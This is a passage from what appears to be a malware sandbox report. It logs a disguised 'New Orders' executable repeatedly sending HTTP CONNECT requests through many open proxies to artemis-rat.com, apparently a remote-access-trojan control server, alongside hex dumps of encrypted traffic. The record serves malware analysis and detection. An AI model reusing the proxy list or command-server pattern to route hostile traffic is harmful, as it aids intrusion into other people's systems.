                                                                                        Mar 11, 2024 16:16:53.049787045 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                        Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                        Mar 11, 2024 16:16:53.049798965 CET238INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                        Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%Qh
                                                                                        Mar 11, 2024 16:16:53.385910034 CET498INData Raw: 49 fd 5a 9a ca 01 23 ac 84 80 2b 02 8c 99 97 eb 49 6a 8c 75 d7 c7 de b2 c9 97 9f 58 48 57 0e 35 a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7
                                                                                        Data Ascii: IZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( #6N(CEP*+U{Z
                                                                                        Mar 11, 2024 16:16:53.460246086 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 04 1d d7 49 51 b4 72 39 65 f9 88 ef 8b 62 1c e5 29 a1 d7 ea ea 7d 71 c8 6c 2f 91 9d 49 b6 7d 0e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 e1 61 71 4d f9 2a 4d dc 37 ae b7 eb 7f ba a2 4b 38 b7 f1 75 87
                                                                                        Data Ascii: %! IQr9eb)}ql/I}(aqM*M7K8uYK'K
                                                                                        Mar 11, 2024 16:16:53.819591045 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 fe da 02 3d 4a 01 14 c2 d9 2a 3d f5 f5 3b 09 eb 9b 67 4c 54 26 9b 87 02 f1 80 e6 af eb 08 68 75 aa c3 ca 12 00 07 bf 3a 73 93 92 05 0e 0b 9a 6a 86 20 0f ec 9b c1 bb c2 ec e7 f2 19 d2 60 ca 00 9b 40 43
                                                                                        Data Ascii: =J*=;gLT&hu:sj `@C "]f"eqkHE:6"|8A&{RLM+-/NNk#>@de0\hY_s;v gdQC;-(}yh#\j
                                                                                        Mar 11, 2024 16:16:53.821281910 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 83 8e 08 39 dd 82 5c ea e4 e3 cb da 1f fd 03 b3 60 26 b9 c0 10 7e 4f 4f df 02 36 33 e2 d3 41 83 62 dd af e3 81 22 7b 96 84 ba b9 68 18 39 30 02 b7 d6 60 40 be 72 ce 2a a7 04 0e b3 7b 3c 27 03 81 ae 73 75 57
                                                                                        Data Ascii: 9\`&~OO63Ab"{h90`@r*{<'suWelhSYH3Ta+E!yZ!oFJ"QuXP{OyV)1"TI:%:{ALBJUB00Pr?Ii;*U*3
                                                                                        Mar 11, 2024 16:16:54.187561989 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 20 ab 3b f6 8c 5e 35 17 87 f0 72 87 09 0c eb 55 da ba 8f 55 79 e5 24 72 a8 87 1e ab 0d c7 67 ea 7f 5d c0 86 d7 ff 49 91 9a eb 02 9a e9 0d ca e9 9f 83 51 1d 14 c5 8c e4 a7 7d 26 48 af 02 ac bb dc b6 84 39 c4
                                                                                        Data Ascii: q ;^5rUUy$rg]IQ}&H9d)8xzE>*-4Oo>><Vuub$opZZsMia,]?mgOo6@FB{HChD6],[:@@INAQ{V1RE


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1762192.168.2.9507188.222.239.209807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.094919920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1763192.168.2.953774135.148.10.16167167672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.095122099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.105305910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.113771915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1764192.168.2.95382151.89.173.40301997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.101948023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.773346901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1765192.168.2.953829107.180.90.8879367672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.107958078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273333073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.273314953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.273416996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.273114920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.273113966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:27.273169041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1766192.168.2.95385767.205.177.122211087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.115875006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273355961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.273345947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1767192.168.2.954512103.26.129.1880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.129832029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.151127100 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1768192.168.2.954508183.89.81.7841457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.130700111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1769192.168.2.95400042.200.196.20880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.130764008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.175044060 CET72INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1770192.168.2.953750222.252.23.580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.133795977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1771192.168.2.95087951.89.173.40607757672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.134355068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273350954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.273332119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.273333073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.273109913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.273124933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1772192.168.2.95505069.61.200.104361817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.134681940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1773192.168.2.9546078.130.39.11733897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.134737968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.473084927 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1774192.168.2.950886188.132.222.16780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.137352943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1775192.168.2.954718162.254.38.202240007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.137610912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273332119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.273334980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.273318052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1776192.168.2.953812103.148.51.1980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.141604900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1777192.168.2.954818129.213.150.20580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.145788908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1778192.168.2.95386692.205.110.118539037672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.159262896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.242163897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.242665052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1779192.168.2.954759176.9.52.249807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.159468889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.242161989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.242655993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1780192.168.2.954734185.151.146.17812347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.168401957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1781192.168.2.954083185.5.209.101807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.168625116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.342947960 CET749INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:53 GMT
                                                                                        Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                        Content-Length: 530
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1782192.168.2.954712195.235.124.143807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.172508001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273397923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.273344994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
